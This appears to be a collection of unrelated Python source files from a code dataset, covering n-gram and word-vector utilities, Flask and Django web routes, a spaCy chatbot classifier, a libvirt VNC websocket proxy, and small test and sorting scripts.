for i, line in enumerate(istream):
if i % 100000 == 0:
print >>sys.stderr, "Line %d (%d 1-grams, %d %d-grams)" \
% (i, len(unigrams), len(counts), n)
words = tokenize_words(line)
ids = words2ids(words, unigrams)
for ngram in window(ids, n):
counts[ngram] += 1
id2word = {v: k for k, v in unigrams.iteritems()}
del unigrams
return counts, id2word
def load_vocab(vocab_file):
vocab = {}
for line in vocab_file:
word, freq = line.strip().split('\t')
freq = int(freq)
vocab[word] = freq
return vocab
def prune_vocab(vocab, n):
nwords = sum(v for v in vocab.itervalues())
nvocab = len(vocab)
print >>sys.stderr, "Input has nwords = %s, vocab size = %d" \
% (nwords, nvocab)
vocab = [(v,k) for k,v in vocab.iteritems()]
vocab = list(reversed(sorted(vocab)))
vocab = vocab[:n]
vocab = {k: v for v, k in vocab}
nremaining = sum(v for v in vocab.itervalues())
percent_kept = float(len(vocab)) / nvocab
percent_mass = float(nremaining) / nwords
print >>sys.stderr, "Keeping %d words (%.2f%% of vocab, %.2f%% of mass)" \
% (len(vocab), 100*percent_kept, 100*percent_mass)
return vocab
def score(golden, predicted):
total_d = 0.0
n = 0
for ref, pred in izip(golden, predicted):
total_d += Levenshtein.distance(ref, pred)
n += 1
return total_d / n
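# Example (illustration only): a single pair differing by one character gives a
# mean edit distance of 1.0.
#   score(['the cat sat'], ['the cat sat.'])  # -> 1.0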
def estimate_probabilities(ngrams):
# no smoothing; if we didn't see it in train, best not insert
ntotal = float(sum(ngrams.itervalues()))
print "%d total syntactic ngrams" % ntotal
p = {k: np.log10(v/ntotal) for k, v in ngrams.iteritems()}
print "Total probability = %f" % sum(10.**v for v in p.itervalues())
return p
normalize_ngrams = estimate_probabilities
class Word2Vec(object):
def __init__(self, words, V):
self.words = words
self.word_to_id = {w: i for i, w in enumerate(self.words)}
self.V = V
@classmethod
def load(cls, istream):
# first line indicates # words and dimension of vectors
header = istream.readline().rstrip().split()
nwords = int(header[0])
d = int(header[1])
print >>sys.stderr, "Allocating %dx%d word vector matrix" \
% (nwords, d)
words = []
V = np.zeros((nwords,d), dtype=np.float32)
# subsequent lines have word and vector
print >>sys.stderr, "Loading word vectors"
for i, line in enumerate(istream):
entry = line.rstrip().split()
word = entry[0]
words.append(word)
V[i] = map(float, entry[1:])
if i % 500000 == 0: print >>sys.stderr, i
return cls(words, V)
def get(self, word):
'''get vector for word'''
if word not in self.word_to_id:
raise ValueError("Word2Vec does not contain '%s'" % word)
id = self.word_to_id[word]
return self.V[id]
def nearest(self, word, indices=None):
'''yield words in ascending order of distance to @word'''
# compute distance from word to all other words
# too much memory to precompute all of these ahead of time
# and vector dimension is too large for a KD-tree to be much help
word_vec = np.array(self.get(word), ndmin=2)
V = self.V if indices is None else self.V[indices]
d = distance.cdist(word_vec, V)[0]
for i in np.argsort(d):
w = self.words[i]
# element 0 is this word (d=0) if this word is in indices
# but not this word if this word is not in indices
if w == word: continue
yield w
class Prediction(object):
keep_top_n = 5
def __init__(self, word, locations, Z, Z_location, *args):
self.word = word
self.locations = locations
self.Z = Z
self.Z_location = Z_location
self.p_anywhere = args[:self.keep_top_n]
self.p_at_location = args[self.keep_top_n:2*self.keep_top_n]
self.p_at_other_location = args[2*self.keep_top_n:3*self.keep_top_n]
self.p_surrounding = args[3*self.keep_top_n:]
#assert self.p_anywhere[0] == self.p_at_location[0]
#assert self.p_at_location[0] != self.p_at_other_location[0]
@property
def location(self):
return self.locations[0]
@property
def order(self):
return len(self.p_surrounding)
@property
def location_posterior(self):
return 10.**(self.Z_location - self.Z)
@property
def word_posterior(self):
return 10.**(self.p_at_location[0] - self.Z)
@property
def location_ratio(self):
return self.p_at_location[0] - self.p_at_other_location[0]
@property
def word_ratio(self):
return self.p_at_location[0] - self.p_at_location[1]
@classmethod
def parse(cls, line):
entry = line.rstrip().split('\t')
word = entry[0]
# locations
loc = map(int, entry[1:cls.keep_top_n])
# probabilities
for i in xrange(cls.keep_top_n+1, len(entry)):
entry[i] = float(entry[i])
return cls(word, loc, *entry[cls.keep_top_n+1:])
class TopK(object):
'''Keep track the top-k objects'''
def __init__(self, n):
self.things = [None] * n
self.values = [float('inf')] * n
def add(self, thing, value):
i = bisect.bisect(self.values, -value)
if i < len(self.values):
self.values[i] = -value
self.things[i] = thing
def update(self, other):
for thing, value in other:
self.add(thing, -value)
def __iter__(self):
        return izip(self.things, self.values)
| StarcoderdataPython |
1734557 | <filename>oteapi_optimade/models/strategies/parse.py
"""Models specific to the parse strategy."""
# pylint: disable=no-self-use
from typing import Any, Dict, Literal, Optional
from optimade.models import Response
from oteapi.models import ResourceConfig, SessionUpdate
from pydantic import Field
from oteapi_optimade.models.config import OPTIMADEConfig
from oteapi_optimade.models.custom_types import OPTIMADEUrl
class OPTIMADEParseConfig(ResourceConfig):
"""OPTIMADE-specific parse strategy config."""
downloadUrl: OPTIMADEUrl = Field(
...,
description="Either a base OPTIMADE URL or a full OPTIMADE URL.",
)
mediaType: Literal[
"application/vnd.optimade+json",
"application/vnd.OPTIMADE+json",
"application/vnd.OPTiMaDe+json",
"application/vnd.optimade+JSON",
"application/vnd.OPTIMADE+JSON",
"application/vnd.OPTiMaDe+JSON",
"application/vnd.optimade",
"application/vnd.OPTIMADE",
"application/vnd.OPTiMaDe",
] = Field(
...,
description="The registered strategy name for OPTIMADEParseStrategy.",
)
configuration: OPTIMADEConfig = Field(
OPTIMADEConfig(),
description=(
"OPTIMADE configuration. Contains relevant information necessary to "
"perform OPTIMADE queries."
),
)
class OPTIMADEParseSession(SessionUpdate):
"""OPTIMADE session for the parse strategy."""
optimade_config: Optional[OPTIMADEConfig] = Field(
None,
description=(
"OPTIMADE configuration. Contains relevant information necessary to "
"perform OPTIMADE queries."
),
)
optimade_response_object: Optional[Response] = Field(
None,
description="An OPTIMADE Python tools (OPT) pydantic response object.",
)
optimade_response: Optional[Dict[str, Any]] = Field(
None,
description="An OPTIMADE response as a Python dictionary.",
)
class Config:
"""Pydantic configuration for `OPTIMADEParseSession`."""
validate_assignment = True
arbitrary_types_allowed = True
| StarcoderdataPython |
3378278 | <gh_stars>0
def swap(arr, i, j):
temp = arr[i]
arr[i] = arr[j]
arr[j] = temp
def bubblesort(arr):
flag = 1
while flag == 1:
flag = 0
for i in range(len(arr)-1):
if arr[i+1] < arr[i]:
swap(arr, i, i+1)
flag = 1
if __name__ == "__main__":
arr = [12, 11, 13, 5, 6, 7]
print(f"Given array is: {arr}", end="\n")
bubblesort(arr)
print(f"Sorted array is: {arr}", end="\n")
| StarcoderdataPython |
1688235 | #! /usr/bin/env python3
import sys
import json
from app import app
from flask import render_template, request
@app.route('/')
@app.route('/index')
def index():
return render_template("index.html", title='Home', app=app)
@app.route('/login')
def login():
return render_template("login.html", title='Login', app=app)
@app.route('/register')
def register():
return render_template("register.html", title='Register', app=app)
@app.route('/about')
def about():
return render_template("about.html", title='About', app=app)
@app.route('/work')
def products():
return render_template("work.html", title='Work', app=app)
@app.route('/events')
def store():
return render_template("events.html", title='Events', app=app)
@app.route('/socialmedia')
def socialMedia():
return render_template("socialmedia.html", title='Social Media', app=app)
@app.route('/subscribe')
def subscribe():
return render_template("subscribe.html", title='Subscribe', app=app)
@app.route('/directory')
def directory():
return render_template("directory.html", title='Directory', app=app)
@app.route('/manage-users')
def manageUsers():
return render_template("manageUsers.html", title="Manage Users", app=app)
@app.route('/profile')
def profile():
user = request.args.get('user', '')
edit = request.args.get('edit', '')
if (user):
return render_template("profile.html", title='Profile', app=app, user=user)
elif (edit == "true"):
return render_template("profile.html", title='Profile', app=app, editmode=True)
else:
return render_template("profile.html", title='Profile', app=app)
@app.route('/account-settings')
def accountSetting():
return render_template("accountSettings.html", title='Account Settings', app=app)
@app.route('/messages')
def messages():
return render_template("messages.html", title='Messages', app=app)
@app.route('/messenger')
def messenger():
sid = request.args.get('sid', '')
if (sid):
return render_template("messenger.html", title='Messenger', app=app, sid=sid)
else:
return render_template("messenger.html", title='Messenger', app=app)
@app.route('/reset')
def reset():
return render_template("reset.html", title='Reset', app=app) | StarcoderdataPython |
3304915 | # -*- coding: utf-8 -*-
import bz2
import sys
import MeCab
from rdflib import Graph
tagger = MeCab.Tagger('')
tagger.parse('')  # work around a mecab-python3 bug, see https://github.com/SamuraiT/mecab-python3/issues/3
def read_ttl(f):
"""Turtle形式のファイルからデータを読み出す"""
while True:
        # for speed, process the file in chunks of about 100 KB
lines = [line.decode("utf-8").rstrip() for line in f.readlines(102400)]
if not lines:
break
for triple in parse_lines(lines):
yield triple
def parse_lines(lines):
"""Turtle形式のデータを解析して返す"""
g = Graph()
g.parse(data='\n'.join(lines), format='n3')
return g
def tokenize(text):
"""MeCabを用いて単語を分割して返す"""
node = tagger.parseToNode(text)
while node:
        if node.stat not in (2, 3):  # ignore the tokens marking the start and end of a sentence
yield node.surface
node = node.next
with bz2.BZ2File(sys.argv[1]) as in_file:
for (_, p, o) in read_ttl(in_file):
if p.toPython() == 'http://persistence.uni-leipzig.org/nlp2rdf/ontologies/nif-core#isString':
for line in o.toPython().split('\n'):
words = list(tokenize(line))
                if len(words) > 20:  # ignore lines of 20 words or fewer
print(' '.join(words))
| StarcoderdataPython |
1740857 | <gh_stars>0
from PyQt4 import QtGui
class BaseDialogMixIn(QtGui.QDialog, object):
'''
Base dialog mixin
'''
def showDialog(self):
'''
Show the dialog.
:return:
'''
self.setupUi(self)
self.retranslateUi(self)
self.show()
self.exec_()
| StarcoderdataPython |
108722 | from django.urls import path
import core.views
app_name = 'core'
urlpatterns = [
path('', core.views.IndexView.as_view(), name='home'),
path('catalog/', core.views.ProductList.as_view(), name='catalog'),
path('catalog/category/<int:category_id>/', core.views.ProductList.as_view(), name='category'),
path('catalog/create', core.views.ProductCreate.as_view(), name='product_create'),
path('catalog/product/<int:pk>/delete/', core.views.ProductDelete.as_view(), name='product_delete'),
path('catalog/product/<int:pk>/update/', core.views.ProductUpdate.as_view(), name='product_update'),
path('catalog/product/<int:pk>/', core.views.ProductDetail.as_view(), name='products'),
path('catalog/product/add_review/<int:pk>/', core.views.Review.as_view(), name='review'),
path('pharmacy/', core.views.PharmacyList.as_view(), name='pharmacy'),
path('pharmacy/<int:pharmacy_id>/', core.views.ProductInPharmacy.as_view(), name='product_in_pharmacy'),
]
| StarcoderdataPython |
1616350 | <filename>classify.py<gh_stars>0
import spacy
import pandas as pd
import numpy as np
import math
# import random
from collections import Counter, defaultdict
import sys
import re
import os
import dataManagment as dm
nlp = spacy.load('en')
import spacy.parts_of_speech as pos_t
VERB = 'VERB'
nsubj = 'nsubj'
dobj = 'dobj'
NN = 'NOUN'
NNS = 'NNS'
ADJ = 'ADJ'
sessions = set()
# this should be replaced with a entity recognition
directions = ["up", "down", "side", "left", "right", "in", "out", "forward", "backward", "north", "south", "east", "west"]
def isDirection(text):
if text in directions:
return True
else:
return False
class Ideas(object):
def __init__(self, doc_):
self.ideas = []
# start with verbs
for word in doc_:
if word.pos_ == VERB:
self.ideas.append(Idea(word))
for idea in self.ideas:
idea.removeBlockWords()
idea.sortTokensToArray()
def __str__(self):
my_string = ""
for idea in self.ideas:
my_string = "{0} *** {1}".format(my_string, str(idea))
# idea should contain noun chunks i think
return my_string
class Idea(object):
def __init__(self, verb):
self.words = set()
self.wordsArray=[]
self.verb = verb
self.words.add(verb)
self.addToken(verb)
def addToken(self, token):
for child in token.children:
if child.pos != pos_t.VERB:
self.addToken(child)
self.words.add(child)
def sortTokensToArray(self):
self.wordsArray = sorted(self.words, key=lambda Token: Token.i)
# run before sort
# removed stop words that are not directions
def removeBlockWords(self):
nonBlockedWords=set()
for token in self.words:
if notStopWord(token):
nonBlockedWords.add(token)
self.words = nonBlockedWords
def __str__(self):
return str(self.wordsArray)
# doc = nlp(u"the rain goes up into the clouds and then comes back down")
# ideas = Ideas(doc)
# print(ideas)
def getIntents(text):
doc=nlp(text)
print("doc")
print(doc)
conseptsPresent=Ideas(doc)
classifications = []
info = {}
info['response']=[]
info["category"]=[]
for idea in conseptsPresent.ideas:
# print(idea)
classifications.append(classify_baysian(idea.wordsArray, catagories, likelihood))
info['response'].append(str(idea))
info['category'].append(classify_baysian(idea.wordsArray, catagories, likelihood))
# save learning data as JSON
for i in range(len(info['response'])):
        entry = dm.LearingEntry(info['category'][i], info['response'][i], info['response'][i])
        updateLearingFile("Training_test/learning.json", entry)
return(classifications)
def read_training_file(fpath):
catagories = Counter()
likelihood =defaultdict(Counter)
training_data = dm.loadData(fpath)
for entry in training_data:
doc =nlp(entry["phrase"])
catagories[entry["classification"]] += 1
for word in doc:
if notStopWord(word):
likelihood[entry["classification"]][word.lemma_] +=1
return (catagories, likelihood)
def printDict(dict):
print(len(dict))
for key, value in dict.items():
print(key, value)
def notStopWord(token):
return not token.is_stop or isDirection(token.lemma_)
# return the class that maximizes the posterior, using a minimum probability floor
def classify_baysian(doc, priors, likelihood):
# print("************************************************")
# printDict(priors)
if len(doc) < 1:
return "garbage"
min_prob = 1E-9
max_class = (-1E6, '')
for catagory in priors:
p=priors[catagory]
n=float(sum(likelihood[catagory].values()))
for token in doc:
p = p * max(min_prob,likelihood[catagory][token.lemma_] )/ n
if p > max_class[0]:
max_class=(p, catagory)
return max_class[1]
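# Illustrative use (added for clarity; the sentence is arbitrary and this assumes
# train_modle() has already populated `catagories` and `likelihood`):
#   tokens = [t for t in nlp(u"the rain goes up") if notStopWord(t)]
#   label = classify_baysian(tokens, catagories, likelihood)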
def updateLearingFile(fpath, entry):
currentData = dm.loadData(fpath)
currentData.append(entry.getJSON())
dm.saveData(fpath, currentData)
def is_non_zero_file(fpath):
return True if os.path.isfile(fpath) and os.path.getsize(fpath) > 0 else False
def train_modle():
training_file = "Training_test/training.json"
global catagories
global likelihood
(catagories, likelihood) = read_training_file(training_file)
load_responces("Training_test/nodes.json")
def load_responces(fpath):
# csvFile = pd.read_csv(filename, low_memory=False, encoding='ISO-8859-1')
global nodes
nodes = set()
loadedNodes = dm.loadData(fpath)
for node in loadedNodes:
        nodes.add(Node(node))  # wrap each loaded entry in a Node object
for node in nodes:
print(node.name)
class Session(object):
def __init__(self, sessionId,baseNode):
self.id=sessionId
self.nodesActivated=[]
self.sortedNodes= sorted(nodes, key=lambda Node: Node.numberOfCalls)
# def nodeAvailible(self, inputContext):
# return self.nodesActivated[-1].
def forceNode(self, actionIntent, decition):
if "yesno" in actionIntent:
print("decition ", decition)
if "yes" in decition:
print("got here yes!!!!!!!!!!!!!!!!!!!!!!!")
if self.activateNode(getNode(self.nodesActivated[-1].yes_force)):
return self.getCurrentBOTResponce()
else:
print("error: could not add forced yes")
if "no" in decition:
if self.activateNode(getNode(self.nodesActivated[-1].no_force)):
return self.getCurrentBOTResponce()
else:
print("error: could not add forced no")
else:
if "restart" in decition:
self.nodesActivated=[]
if self.activateNode(getNode(actionIntent)):
return self.getCurrentBOTResponce()
else:
print("error: could not add foced node")
def nextNode(self, intents):
# self.nodesActivated
# self.wordsArray = sorted(self.words, key=lambda Token: Token.i)
        for node in self.sortedNodes:  # search the ordered list of least-used responses
            if node.name in intents:  # if the node is in the list of intents
                if self.activateNode(node):  # try to add the node to the current session
                    return self.getCurrentBOTResponce()  # if added, return the response
# for intent in intents:
# if self.activateNode(getNode(str(intent))):
# return self.getCurrentBOTResponce()
# not found
return "defalt text responce"
def activateNode(self, node):
if self.isContextAvailable(node.input_context):
self.nodesActivated.append(node)
# self.sortedNodes = sorted(self.nodesActivated, key=lambda Token: Token.i
self.sortedNodes = sorted(nodes, key=lambda Node: Node.numberOfCalls)
for node in self.sortedNodes:
print(node.name," ",node.numberOfCalls)
return True
else:
return False
def printHistory(self):
histString=''
for node in self.nodesActivated:
histString = "{0} > {1}".format(histString, node.name)
print(histString)
def getCurrentBOTResponce(self):
callResponceIndex = self.nodesActivated[-1].getCallNumberInctement()
print(callResponceIndex)
        return self.nodesActivated[-1].responses[callResponceIndex].text
def isContextAvailable(self, input_contexts):
if len(self.nodesActivated) == 0: #first welcome node
return True
# if "pass_through" in input_contexts:
# if len(self.nodesActivated)<2:
# print("not sure how we got here with less then 2 activate nodes")
# return self.nodesActivated[-2].isContextAvailableNode(input_contexts)
# else:
return self.nodesActivated[-1].isContextAvailableNode(input_contexts)
def currentContext(self):
return self.nodesActivated[-1].output_context
class Node(object):
# def __init__(self, name, responce,input_context,output_context):
def __init__(self, nodeLoadedInfo):
# csvFile["category"][i], csvFile["reply"][i],
# csvFile["input_context"][i],csvFile["output_context"][i]
self.name = nodeLoadedInfo["classification"]
self.numberOfCalls=0
        self.input_context = nodeLoadedInfo["input_context"]
        self.output_context = nodeLoadedInfo["output_context"]
self.responses = []
for responce in nodeLoadedInfo["response"]:
self.responses.append(Responce(responce))
# self.yes_force = nodeLoadedInfo["yes_force"]
# self.no_force = nodeLoadedInfo["no_force"]
# this should indicate if we have gone through them all which it does not right now ********
def getCallNumberInctement(self):
currentCallIndex = self.numberOfCalls
        print(self.responses)
        self.numberOfCalls = (self.numberOfCalls + 1) % len(self.responses)
return currentCallIndex
# check
def isContextAvailableNode(self, input_contexts):
for input_context in input_contexts:
if input_context in self.output_context:
return True
return False
# self.availibleNodes=2
class Responce(object):
def __init__(self, responceLoaded):
self.text = responceLoaded["text"]
self.input_context = responceLoaded["input_context"]
self.output_context = responceLoaded["output_context"]
self.decisions = set()
for decision in responceLoaded["decision"]:
self.decisions.add(Decision(decision))
class Decision(object):
def __init__(self, loadedDecision):
self.name = loadedDecision["name"]
self.destination = loadedDecision["node"]
def getNode(category):
for node in nodes:
if node.name == category:
return node
print(category, " is unclasified")
for node in nodes:
if node.name == "unknown":
return node
# should never get here
return False
def startSession(ID, node):
session = Session(ID, node)
sessions.add(session)
return session
def getSession(ID):
for session in sessions:
if ID == session.id:
return session
# if not found
return startSession(ID, getNode("base"))
| StarcoderdataPython |
58259 | <gh_stars>1-10
#!/usr/bin/env python3
import re
import os
import sys
import socket
from xml.etree import ElementTree
import libvirt
import logging
from http import cookies
from optparse import OptionParser
from websockify import WebSocketProxy
from websockify import ProxyRequestHandler
def get_xml_data(xml, path=None, element=None):
res = ''
if not path and not element:
return ''
tree = ElementTree.fromstring(xml)
if path:
child = tree.find(path)
if child is not None:
if element:
res = child.get(element)
else:
res = child.text
else:
res = tree.get(element)
return res
parser = OptionParser()
parser.add_option("-v",
"--verbose",
dest="verbose",
action="store_true",
help="Verbose mode",
default=False)
parser.add_option("-d",
"--debug",
dest="debug",
action="store_true",
help="Debug mode",
default=False)
parser.add_option("-H",
"--host",
dest="host",
action="store",
help="Listen host",
default='0.0.0.0')
parser.add_option("-p",
"--port",
dest="port",
action="store",
help="Listen port",
default=6080)
parser.add_option("-c",
"--cert",
dest="cert",
action="store",
help="Certificate file path",
default='cert.pem')
(options, args) = parser.parse_args()
FORMAT = "%(asctime)s - %(name)s - %(levelname)s : %(message)s"
if options.debug:
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
options.verbose = True
elif options.verbose:
logging.basicConfig(level=logging.INFO, format=FORMAT)
else:
logging.basicConfig(level=logging.WARNING, format=FORMAT)
def get_conn_data(token):
port = None
try:
conn = libvirt.open('qemu:///system')
for dom in conn.listDomainsID():
if token == dom.UUIDString():
xml = dom.XMLDesc()
console_type = get_xml_data(xml, 'devices/graphics', 'type')
port = get_xml_data(xml, f"devices/graphics[@type='{console_type}']", 'port')
conn.close()
except libvirt.libvirtError as err:
logging.error(
f'Fail to retrieve console connection infos for token {token} : {err}')
raise
return port
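# Illustrative call (the UUID below is hypothetical; it must match the UUID of a
# running libvirt domain for a graphics port to be returned):
#   port = get_conn_data('123e4567-e89b-12d3-a456-426614174000')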
class CompatibilityMixIn(object):
def _new_client(self, daemon, socket_factory):
cookie = cookies.SimpleCookie()
cookie.load(self.headers.get('cookie'))
if 'token' not in cookie:
logging.error('- Token not found')
return False
console_host = 'localhost'
console_port = get_conn_data(cookie.get('token').value)
cnx_debug_msg = "Connection Info:\n"
cnx_debug_msg += f" - VNC host: {console_host}\n"
cnx_debug_msg += f" - VNC port: {console_port}"
logging.debug(cnx_debug_msg)
# Direct access
tsock = socket_factory(console_host, console_port, connect=True)
if self.verbose and not daemon:
print(self.traffic_legend)
# Start proxying
try:
self.vmsg(f"{console_host}:{console_port}: Websocket client or Target closed")
self.do_proxy(tsock)
except Exception:
raise
class NovaProxyRequestHandler(ProxyRequestHandler, CompatibilityMixIn):
def msg(self, *args, **kwargs):
self.log_message(*args, **kwargs)
def vmsg(self, *args, **kwargs):
if self.verbose:
self.msg(*args, **kwargs)
def new_websocket_client(self):
"""
Called after a new WebSocket connection has been established.
"""
# Setup variable for compatibility
daemon = self.server.daemon
socket_factory = self.server.socket
self._new_client(daemon, socket_factory)
if __name__ == '__main__':
# Create the WebSocketProxy with NovaProxyRequestHandler handler
server = WebSocketProxy(RequestHandlerClass=NovaProxyRequestHandler,
listen_host=options.host,
listen_port=options.port,
source_is_ipv6=False,
verbose=options.verbose,
cert=options.cert,
key=None,
ssl_only=False,
daemon=False,
record=False,
web=False,
traffic=False,
target_host='ignore',
target_port='ignore',
wrap_mode='exit',
wrap_cmd=None)
server.start_server()
| StarcoderdataPython |
1705563 | import unittest
from unittest.mock import Mock
from supergsl.core.types.codon import CodonFrequencyTable
from supergsl.plugins.codon_frequency.provider import CodonFrequencyTableProvider
class CodonFrequencyTableProviderTestCase(unittest.TestCase):
"""Test case for CodonFrequencyTableProvider."""
def setUp(self):
self.provider = CodonFrequencyTableProvider({})
def test_get_table(self):
"""Test that get table returns a dictionary of table info."""
table = self.provider.get_table('s_cerevisiae_4932')
self.assertTrue(isinstance(table, CodonFrequencyTable))
self.assertEqual(table.name, 's_cerevisiae_4932')
def test_resolve_import_inserts_into_symbol_table(self):
self.provider.get_table = Mock(return_value='HELLO')
results = self.provider.resolve_import(
's_cerevisiae_4932',
'thesacc'
)
self.assertEqual(results['thesacc'], 'HELLO')
| StarcoderdataPython |
1600829 | <reponame>riichi/kcc3
from badges.local_badge_client import LocalBadgeClient, PlayerIterable
from badgeupdater.models import BadgeUpdateRequest
from players.models import Player
class TestBadgeClient(LocalBadgeClient):
def get_badge_players(self, request: BadgeUpdateRequest) -> PlayerIterable:
return Player.objects.all()
| StarcoderdataPython |
3342156 | <filename>src/launcher/app_chooser.py
# coding: utf-8
"""
Contains code for the app chooser.
"""
from gi.repository import Gdk, GLib, Gio, Gtk
from aspinwall.launcher.config import config
# Used by AppIcon to find the app chooser revealer
app_chooser = None
def app_info_to_filenames(appinfo):
"""Takes a list of apps and returns their filenames."""
output = {}
for app in appinfo:
output[app.get_filename()] = app
return output
@Gtk.Template(resource_path='/org/dithernet/aspinwall/launcher/ui/appicon.ui')
class AppIcon(Gtk.FlowBoxChild):
"""Contains an app icon for the app chooser."""
__gtype_name__ = 'AppIcon'
app = None
app_icon = Gtk.Template.Child()
app_name = Gtk.Template.Child()
popover = Gtk.Template.Child()
def __init__(self, app=None):
"""Initializes an AppIcon."""
super().__init__()
self.popover.present()
if app.get_filename() in config['favorite-apps']:
self.is_favorite = True
else:
self.is_favorite = False
if app:
self.bind_to_app(app)
def bind_to_app(self, app):
"""Fills the AppIcon with an app's information."""
self.app = app
self.app_icon.set_from_gicon(app.get_icon())
self.app_name.set_label(app.get_name())
longpress_gesture = Gtk.GestureLongPress()
longpress_gesture.set_propagation_phase(Gtk.PropagationPhase.CAPTURE)
longpress_gesture.connect('pressed', self.show_menu)
self.add_controller(longpress_gesture)
# Set up context menu actions
self.install_action('favorite', None, self.favorite)
self.install_action('unfavorite', None, self.unfavorite)
if self.is_favorite:
self.action_set_enabled('favorite', False)
else:
self.action_set_enabled('unfavorite', False)
def favorite(self, app_icon, *args):
"""Adds the app to favorites."""
if app_icon.app.get_filename() not in config['favorite-apps']:
config['favorite-apps'] = config['favorite-apps'] + [app_icon.app.get_filename()]
self.is_favorite = True
self.action_set_enabled('unfavorite', True)
self.action_set_enabled('favorite', False)
app_chooser.filter.changed(Gtk.FilterChange.MORE_STRICT)
app_chooser.favorites_filter.changed(Gtk.FilterChange.LESS_STRICT)
if not app_chooser.in_search:
app_chooser.favorites_revealer.set_reveal_child(True)
def unfavorite(self, app_icon, *args):
"""Removes the app from favorites."""
if app_icon.app.get_filename() in config['favorite-apps']:
new_list = config['favorite-apps'].copy()
new_list.remove(app_icon.app.get_filename())
config['favorite-apps'] = new_list
self.is_favorite = False
self.action_set_enabled('favorite', True)
self.action_set_enabled('unfavorite', False)
app_chooser.filter.changed(Gtk.FilterChange.LESS_STRICT)
app_chooser.favorites_filter.changed(Gtk.FilterChange.MORE_STRICT)
if not new_list:
app_chooser.favorites_revealer.set_reveal_child(False)
@Gtk.Template.Callback()
def run(self, *args):
"""Opens the app represented by the app icon."""
context = Gdk.Display.get_app_launch_context(self.get_display())
self.app.launch(None, context)
app_chooser.hide()
def show_menu(self, event_controller, *args):
"""Shows the app icon menu."""
# FIXME: Newly added icons seem to keep the unfavorite action enabled;
# this fixes it, but there is probably a deeper root cause
if self.is_favorite:
self.action_set_enabled('favorite', False)
else:
self.action_set_enabled('unfavorite', False)
self.popover.show()
@Gtk.Template(resource_path='/org/dithernet/aspinwall/launcher/ui/appchooser.ui')
class AppChooser(Gtk.Box):
"""App chooser widget."""
__gtype_name__ = 'AppChooser'
# Whether we are currently searching or not
in_search = False
app_grid = Gtk.Template.Child()
favorites_revealer = Gtk.Template.Child()
favorites_grid = Gtk.Template.Child()
search = Gtk.Template.Child()
no_results = Gtk.Template.Child()
def __init__(self):
"""Initializes an app chooser."""
super().__init__()
# Set up store for app model
self.store = Gio.ListStore(item_type=Gio.AppInfo)
self.fill_model()
# Set up sort model
self.sort_model = Gtk.SortListModel(model=self.store)
self.sorter = Gtk.CustomSorter.new(self.sort_func, None)
self.sort_model.set_sorter(self.sorter)
# Set up filter model
filter_model = Gtk.FilterListModel(model=self.sort_model)
self.filter = Gtk.CustomFilter.new(self.filter_by_name, filter_model)
filter_model.set_filter(self.filter)
self.search.connect('search-changed', self.search_changed)
# Set up favorites model
self.favorites_model = Gtk.FilterListModel(model=self.store)
self.favorites_filter = Gtk.CustomFilter.new(
self.is_favorite,
self.favorites_model
)
self.favorites_model.set_filter(self.favorites_filter)
self.model = filter_model
# Set up app grid
self.app_grid.bind_model(self.model, self.bind, None)
# Set up favorites grid
self.favorites_grid.bind_model(self.favorites_model, self.bind, None)
# Show/hide the favorites depending on whether there are any
if config['favorite-apps']:
self.favorites_revealer.set_reveal_child(True)
else:
self.favorites_revealer.set_reveal_child(False)
global app_chooser
app_chooser = self
def fill_model(self):
"""Fills the favorites and app grid models."""
appinfo = Gio.AppInfo.get_all()
self.store.remove_all()
for app in appinfo:
if not Gio.AppInfo.should_show(app):
continue
self.store.append(app)
self.previous_appinfo = self.store
def update_model(self):
"""Updates the app grid model."""
_appinfo = Gio.ListStore(item_type=Gio.AppInfo)
for app in Gio.AppInfo.get_all():
if app.should_show():
_appinfo.append(app)
appinfo = app_info_to_filenames(_appinfo)
previous_appinfo = app_info_to_filenames(self.previous_appinfo)
# Comparing the stores to each other erroneously returns True
if previous_appinfo.keys() != appinfo.keys():
new_appinfo = list(set(previous_appinfo.keys()) - set(appinfo.keys())) + \
list(set(appinfo.keys()) - set(previous_appinfo.keys()))
for app_name in new_appinfo:
if app_name in previous_appinfo:
# App removed
find = self.store.find(previous_appinfo[app_name])
if find[0]:
self.store.remove(find[1])
if app_name in config['favorite-apps']:
new_list = config['favorite-apps'].copy()
new_list.remove(app_name)
config['favorite-apps'] = new_list
self.sorter.changed(Gtk.SorterChange.DIFFERENT)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
self.favorites_filter.changed(Gtk.FilterChange.DIFFERENT)
else:
# App added
self.store.append(appinfo[app_name])
self.sorter.changed(Gtk.SorterChange.DIFFERENT)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
self.favorites_filter.changed(Gtk.FilterChange.DIFFERENT)
if config['favorite-apps'] and not self.in_search:
self.favorites_revealer.set_reveal_child(True)
else:
self.favorites_revealer.set_reveal_child(False)
def bind(self, app, *args):
"""Binds the list items in the app grid."""
return AppIcon(app)
def filter_by_name(self, appinfo, user_data):
"""Fill-in for custom filter for app grid."""
query = self.search.get_text()
if not query:
if appinfo.get_filename() in config['favorite-apps']:
return False
return True
query = query.casefold()
if query in appinfo.get_name().casefold():
return True
if appinfo.get_generic_name():
if query in appinfo.get_generic_name().casefold():
return True
for keyword in appinfo.get_keywords():
if query in keyword.casefold():
return True
return False
def is_favorite(self, appinfo, *args):
"""
Takes a Gio.AppInfo and returns whether the app is in favorites or not.
"""
if appinfo.get_filename() in config['favorite-apps']:
return True
return False
def sort_func(self, a, b, *args):
"""Sort function for the app grid icon sorter."""
a_name = GLib.utf8_casefold(a.get_name(), -1)
if not a_name:
a_name = ''
b_name = GLib.utf8_casefold(b.get_name(), -1)
if not b_name:
b_name = ''
return GLib.utf8_collate(a_name, b_name)
def search_changed(self, search_entry, *args):
"""Notifies the filter about search changes."""
if search_entry.get_text():
self.in_search = True
self.favorites_revealer.set_reveal_child(False)
else:
self.in_search = False
self.favorites_revealer.set_reveal_child(True)
self.no_results.set_visible(False)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
if self.model.get_n_items() == 0:
self.no_results.set_visible(True)
else:
self.no_results.set_visible(False)
# Select first item in list
first_item = self.app_grid.get_first_child()
if first_item:
first_item.grab_focus()
# TODO: Scroll back to top of list
@Gtk.Template.Callback()
def hide(self, *args):
"""Hides the app chooser."""
self.get_parent().set_reveal_flap(False)
self.get_native().pause_focus_manager = False
| StarcoderdataPython |
128312 | <reponame>MthBr/well-plate-light-driven-predictions<gh_stars>0
import cv2
import sys
import matplotlib.pyplot as plt
import numpy as np
#image_file = 'WellPlate_project/feature_eng/2.jpg'
